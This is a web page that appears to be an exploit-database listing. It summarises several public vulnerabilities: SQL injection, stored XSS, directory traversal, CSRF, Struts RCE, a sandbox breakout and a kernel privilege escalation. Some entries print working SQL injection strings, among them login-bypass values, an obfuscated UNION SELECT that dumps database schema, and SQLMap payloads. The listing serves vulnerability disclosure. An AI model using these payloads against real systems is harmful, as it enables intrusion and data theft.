header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Online Invoice System 3.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands. Bypass: http://localhost/[PATH]/index.php User: 'or 1=1 or ''=' Pass: anything User: anything Pass: 'or 1=1 or ''=' Sql: http://localhost/[PATH]/editclient.php?cid=[SQL] -5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VERSION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(SelECt+CoUnt(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629)--+- http://localhost/[PATH]/admin_invoice_print.php?id=[SQL] http://localhost/[PATH]/edit_invoice.php?id=[SQL] http://localhost/[PATH]/admin_invoice.php?id=[SQL]

HRM – Workable Zone : Ultimate HR System <= 1.2 - Unauthenticated Directory Traversal / Stored XSS

Multiple Stored XSS vulnerabilities were found in Workable Zone, a Human resourse(HR) management software for companies of all sizes. The Stored XSS can be exploited by entering malicious payloads into the Last Name, First Name, and Contact Number fields when logged in as an Employee. The Directory Traversal vulnerability can be exploited by sending a request to the download page with a malicious filename parameter.

Struts 2.5 – 2.5.12 REST Plugin XStream RCE

Struts 2.5 - 2.5.12 REST Plugin XStream RCE is a vulnerability in Apache Struts 2.5 - 2.5.12 which allows an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused by the improper handling of XML payloads in the REST plugin. An attacker can exploit this vulnerability by sending a specially crafted XML payload to the vulnerable system. The payload contains malicious code which is executed on the vulnerable system.

X Server Sandbox Breakout in Linux

From inside the Linux sandbox described in <https://blog.torproject.org/blog/tor-browser-70-released>, it is still possible to talk to the X server without any restrictions. This means that a compromised browser can e.g. use the XTEST X protocol extension (<https://www.x.org/releases/X11R7.7/doc/xextproto/xtest.html>) to fake arbitrary keyboard and mouse events, directed at arbitrary windows. This permits a sandbox breakout, e.g. by injecting keypresses into a background window.

Jungo DriverWizard WinDriver Kernel Out-of-Bounds Write Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the processing of IOCTL 0x953824a7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in an out-of-bounds write condition. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.

Pay Banner Text Link Ad 1.0.6.1 – SQL Injection

The vulnerability allows an users to inject sql commands into the vulnerable parameters of the application. Proof of Concept: http://localhost/[PATH]/index.php?action=stats&id=[SQL], http://localhost/[PATH]/index.php?action=previewad&id=[SQL]

Pay Banner Text Link Ad 1.0.6.1 – Cross-Site Request Forgery (Update Admin User&Pass)

A Cross-Site Request Forgery (CSRF) vulnerability exists in Pay Banner Text Link Ad 1.0.6.1, which allows an attacker to update the admin username and password. An attacker can craft a malicious HTML page that contains a form with the username and password fields pre-filled with the desired values. When an authenticated admin user visits the malicious page, the form will be automatically submitted, allowing the attacker to update the admin credentials.

Advertiz PHP Script 0.2 – Cross-Site Request Forgery (Update Admin User&Pass)

Advertiz PHP Script 0.2 is vulnerable to Cross-Site Request Forgery (CSRF) which allows an attacker to update the admin username and password. An attacker can craft a malicious HTML page containing a form with the username and password fields pre-filled with the desired values. When the admin visits the malicious page, the form will be automatically submitted and the admin's credentials will be updated.

Cory Support (pr) SQL Injection Vulnerability

An attacker can exploit this vulnerability to read from the database. The parameter 'pr' is vulnerable. Proof of Concept: http://domain.tld/[path]/listfaq.php?pr=9999+and+1=2+union+all+select+null,version()-- Exploitation via SQLMap: Parameter: pr (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pr=1 AND 4809=4809 Vector: AND [INFERENCE] Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: pr=1 UNION ALL SELECT NULL,CONCAT(0x7170706271,0x564f724b4475754c4c7a48714c59464c6c43704a636c6f72444471767a79716a6b6d4d6a72654b76,0x7170626b71)-- RNyi Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]

Recent Exploits: